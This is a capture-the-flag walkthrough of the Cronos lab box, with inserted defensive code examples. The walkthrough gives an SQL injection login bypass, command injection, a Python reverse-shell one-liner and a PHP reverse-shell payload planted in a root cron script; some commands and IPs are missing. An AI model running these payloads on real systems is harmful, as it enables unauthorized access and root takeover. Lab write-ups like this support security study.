Service Enumeration

-H -t all

We can perform a DNS zone transfer, guessing that the domain is cronos.htb:

dig axfr @ cronos.htb

Here, we uncover some subdomains for cronos.htb. Let's add them to our /etc/hosts file.

Now, browsing to www.cronos.htb and admin.cronos.htb yields valid webpages.


The admin.cronos.htb login page is vulnerable to SQL injection. Using the payload:

username=' or 1=1;#&password=

We can bypass the authentication. Note that this does not work on the password field.
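To see why that username payload defeats the login and why a parameterized query does not, here is an added example (not code from the page or the box). It uses an in-memory SQLite table with a constructed admin account; because SQLite does not treat MySQL's # as a line comment, the equivalent "-- " comment form, accepted by both engines, stands in for it. The password-hashing step is an assumption made to illustrate why the same payload in the password field has no effect.

```python
import hashlib
import sqlite3

# Constructed credentials for the in-memory demo table (not from the page).
DEMO_USER = "admin"
DEMO_PASSWORD = "correct horse battery staple"

# The page's payload ends the username with MySQL's '#' line comment.
# SQLite (used here so the example runs offline) does not treat '#' as a
# comment, so the equivalent '-- ' form, accepted by both engines, is used.
PAYLOAD_USERNAME = "' or 1=1;-- "


def hash_password(password):
    # Assumption: the application hashes the password before it reaches the
    # query. The hex digest contains no quote characters, which is one
    # explanation for why the password field is not injectable. md5 is used
    # only to mirror that shape; it is not a suitable password hash.
    return hashlib.md5(password.encode()).hexdigest()


def make_db():
    """Create an in-memory users table holding one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (DEMO_USER, hash_password(DEMO_PASSWORD)),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The flawed pattern: the username is spliced into the SQL text."""
    query = (
        "SELECT id FROM users WHERE username = '" + username + "' "
        "AND password = '" + hash_password(password) + "'"
    )
    # With PAYLOAD_USERNAME the statement becomes
    #   SELECT id FROM users WHERE username = '' or 1=1;-- ' AND password = '...'
    # so the password condition is commented away and every row matches.
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn, username, password):
    """The fix: bind values as parameters, so input is data, never SQL."""
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, hash_password(password)),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload in username:", login_vulnerable(db, PAYLOAD_USERNAME, "x"))
    print("vulnerable, payload in password:", login_vulnerable(db, DEMO_USER, PAYLOAD_USERNAME))
    print("parameterized, payload in username:", login_parameterized(db, PAYLOAD_USERNAME, "x"))
```

Run it directly to see the three outcomes: the string-built query accepts the payload in the username field, rejects it in the (hashed) password field, and the parameterized query rejects it in both.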

We get access to the following tool:

If we examine the POST request, we see that ping -c 1 is sent as the command parameter. It is possible that the server is not sanitizing the input and is passing the command parameter straight into the OS command.

Indeed, changing -c 1 to -c 2 changes the command executed!

We now have an RCE vulnerability. Executing the which python command shows that Python is installed on the server.
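The root cause is a design in which the client submits the whole command line and the server hands it to a shell. The following is an added example (not the box's code) contrasting that pattern with a hardened one: the client may only submit a host, the server validates it as an IP address, and the command is built as an argument vector that never passes through a shell. A small request-log check for shell metacharacters is included as a detection aid. The 192.0.2.10 address is a constructed documentation-range value.

```python
import ipaddress
import subprocess

# Characters that let a value break out of a single shell word.
SHELL_METACHARS = set(";|&$`()<>\n\\\"'")


def shell_argv_vulnerable(command_param):
    """What a system()/shell=True style call does with the submitted
    parameter: the whole client-supplied string becomes the program text
    the shell interprets, which is why changing "-c 1" to "-c 2" changes
    what executes. Returned here, not executed."""
    return ["/bin/sh", "-c", command_param]


def contains_shell_metachars(value):
    """Request-log check: does a submitted value carry shell syntax?"""
    return any(ch in SHELL_METACHARS for ch in value)


def ping_argv(host, count=1):
    """Hardened design: the client supplies only a host, the server
    validates it as an IP address and bounds the count, and the result is
    an argument vector for execve-style execution (no shell involved)."""
    try:
        target = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"rejected host: {host!r}") from None
    if not 1 <= int(count) <= 5:
        raise ValueError(f"rejected count: {count!r}")
    return ["ping", "-c", str(int(count)), str(target)]


def run_ping(host, count=1):
    """Execute the validated command without a shell; returns the exit code."""
    result = subprocess.run(ping_argv(host, count), capture_output=True,
                            text=True, timeout=15)
    return result.returncode


if __name__ == "__main__":
    print(shell_argv_vulnerable("ping -c 2 192.0.2.10"))
    print(ping_argv("192.0.2.10", 2))
    for value in ("192.0.2.10", "192.0.2.10; id"):
        print(value, "->", "suspicious" if contains_shell_metachars(value) else "clean")
```

The important difference is not the metacharacter filter (which is only a logging heuristic) but that ping_argv accepts a single typed value and rejects anything that is not an IP address, so there is no string for a shell to reinterpret.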

We can use a Python reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

After URL encoding, we can edit the command parameter:


On our Netcat listener, we receive the reverse shell.

Privilege Escalation

We can use LinPEAS to enumerate.

We find the following cron job that runs every minute:

The script that is run is a PHP script:

We can change this to our custom PHP payload:

<?php $sock=fsockopen("",4242); $proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>

The next time the cron job is run, we obtain a root shell on our listener.
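The escalation works because a root cron job executes a file that a lower-privileged user can rewrite. As an added example (not code from the page), here is a small audit script that parses /etc/crontab-style entries, finds the files each root job references, and flags any that are owned by someone other than the expected owner or are group- or world-writable. The crontab lines and paths are constructed placeholders; demo() builds two scripts in a temporary directory and, so it can run unprivileged, treats the current user as the expected owner.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab-style lines (system crontab: five time fields,
# the user to run as, then the command). The paths are placeholders, not
# the box's real ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow user  command
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
* * * * * root /usr/bin/php /var/www/example/cronjob.php
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""


def parse_system_crontab(text):
    """Return a list of {schedule, user, command} dicts; comments, blank
    lines and VAR=value lines are skipped (@reboot-style entries are not
    handled)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) < 7 or "=" in fields[0]:
            continue
        jobs.append({"schedule": " ".join(fields[:5]),
                     "user": fields[5], "command": fields[6]})
    return jobs


def modifiable_by_non_owner(path, expected_owner_uid=0):
    """True if the file is owned by someone other than the expected owner
    or is group- or world-writable. (Parent directories are not checked.)"""
    st = os.stat(path)
    if st.st_uid != expected_owner_uid:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_root_cron_jobs(crontab_text, expected_owner_uid=0):
    """Flag files referenced by root's cron commands that a non-root user
    could rewrite; returns (command, offending_path) pairs."""
    findings = []
    for job in parse_system_crontab(crontab_text):
        if job["user"] != "root":
            continue
        for token in job["command"].split():
            if token.startswith("/") and os.path.isfile(token):
                if modifiable_by_non_owner(token, expected_owner_uid):
                    findings.append((job["command"], token))
    return findings


def demo():
    """Create two scripts in a temp directory, one world-writable, and audit
    a crontab that runs both as root. The current user stands in for root so
    the check runs without privileges."""
    tmp = tempfile.mkdtemp()
    unsafe = os.path.join(tmp, "cronjob.php")
    safe = os.path.join(tmp, "safe.php")
    for path in (unsafe, safe):
        with open(path, "w") as fh:
            fh.write("<?php echo 'scheduled task'; ?>\n")
    os.chmod(unsafe, 0o666)
    os.chmod(safe, 0o644)
    crontab = (
        f"* * * * * root /nonexistent/php {unsafe}\n"
        f"* * * * * root /nonexistent/php {safe}\n"
    )
    return audit_root_cron_jobs(crontab, expected_owner_uid=os.getuid())


if __name__ == "__main__":
    for command, path in demo():
        print(f"WRITABLE BY NON-ROOT: {path}  (job: {command})")
```

On a real host you would feed it the contents of /etc/crontab and the files under /etc/cron.d with the default expected owner of 0; anything it reports is a script root will execute on schedule that someone else can edit, which is exactly the condition exploited above.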
